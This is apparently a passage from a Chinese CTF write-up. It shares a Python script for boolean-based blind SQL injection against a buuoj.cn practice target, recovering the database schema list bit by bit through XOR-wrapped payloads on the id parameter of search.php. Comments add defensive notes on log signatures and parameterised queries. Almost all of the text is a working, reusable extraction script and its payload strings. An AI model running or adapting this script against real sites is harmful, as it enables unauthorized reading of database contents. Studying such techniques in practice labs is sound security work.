具体的思路网上也还有其他的,这里我就分享一个脚本
这个是爆数据名,表名,列名类推
import requests
import time

# Boolean-based blind SQL injection script from a CTF writeup.  It appends a
# `^(<condition>)^1` expression to the `id` parameter of search.php on a
# buuoj.cn practice node and recovers the comma-joined list of schema names
# (`group_concat(SCHEMA_NAME)` from `information_schema.SCHEMATA`) one bit at
# a time: a probe is treated as "true" when the response body contains the
# word 'Click'.  Every recovered character costs 6-7 requests (one per bit
# of its ASCII code), which is what makes this technique slow and, from the
# defender's side, very visible: a long burst of requests to search.php whose
# `id` value contains `substr(bin(ascii(` is the shape a WAF or log rule keys on.
# Parameterised queries remove the injection point entirely.
#
# NOTE(review): the script rebinds `re`, `len` and `str`, shadowing the stdlib
# module and two builtins for the rest of the file; later code must not rely on
# them.  Indentation below is reconstructed from the logic of the flattened paste.
database_all = ''
url = 'http://7023b2d9-28ff-48a1-b167-05f060adfc6e.node4.buuoj.cn/search.php?id=1'

# Step 1: work out how many decimal digits the total length has (e.g. a total
# length of 43 has 2 digits).  `length(length(...))` yields that digit count;
# its ASCII code is read as a 6-bit binary string, one bit per request.
weishu = ''
for i in range(1, 7):
    sql = "^(substr(bin(ascii(length(length((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA)))))),{},1)=1)^1".format(i)
    re = requests.get(url+sql, timeout=1000)  # `re` here is the HTTP response, not the regex module
    if re.status_code == 200:
        if 'Click' in re.text:
            weishu += '1'
        else:
            weishu += '0'
# Bits -> ASCII code -> digit character -> digit count (e.g. '110010' -> 50 -> '2' -> 2)
weishu = int(chr(int(weishu, 2)))

# Step 2: work out the exact total length, one decimal digit at a time.
# For digit position i, `substr(length(...), i, 1)` is the digit character and
# its ASCII code is again read as 6 bits.  `len` is built up as a string here.
len = ''
for i in range(1, weishu+1):
    len_wei = ''
    for j in range(1, 7):
        sql = "^(substr(bin(ascii(substr(length((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA))),{},1))),{},1)=1)^1".format(i, j)
        re = requests.get(url+sql, timeout=1000)
        if re.status_code == 200:
            if 'Click' in re.text:
                len_wei += '1'
            else:
                len_wei += '0'
    len += chr(int(len_wei, 2))

# Step 3: recover each character of the schema list.  `range(...)` is evaluated
# once, so reassigning `len` inside the loop body does not change the iteration.
for i in range(1, int(len)+1):
    # Does the character's ASCII code need 7 bits (>= 64) or only 6?
    # `len` is only reassigned on a 200 response; otherwise it keeps its previous value.
    sql = "^(length(bin(ascii(substr((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA)),{},1))))=7)^1".format(i)
    re = requests.get(url+sql, timeout=1000)
    time.sleep(1)  # pacing between requests (absent from steps 1 and 2)
    if re.status_code == 200:
        if 'Click' in re.text:
            len = 7
        else:
            len = 6
    # Read the character's bits MSB-first into `str` (shadows the builtin).
    str = ''
    for j in range(1, len+1):
        sql = '^(substr(bin(ascii(substr((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA)),{},1))),{},1)=1)^1'.format(
            i, j)
        re = requests.get(url+sql, timeout=1000)
        time.sleep(1)
        if re.status_code == 200:
            if 'Click' in re.text:
                str += '1'
            else:
                str += '0'
    database_all += chr(int(str, 2))
    # Prints the partial result after each character; the flattened paste does not
    # show whether this line sat inside or after the loop - presumably inside, for progress.
    print(database_all)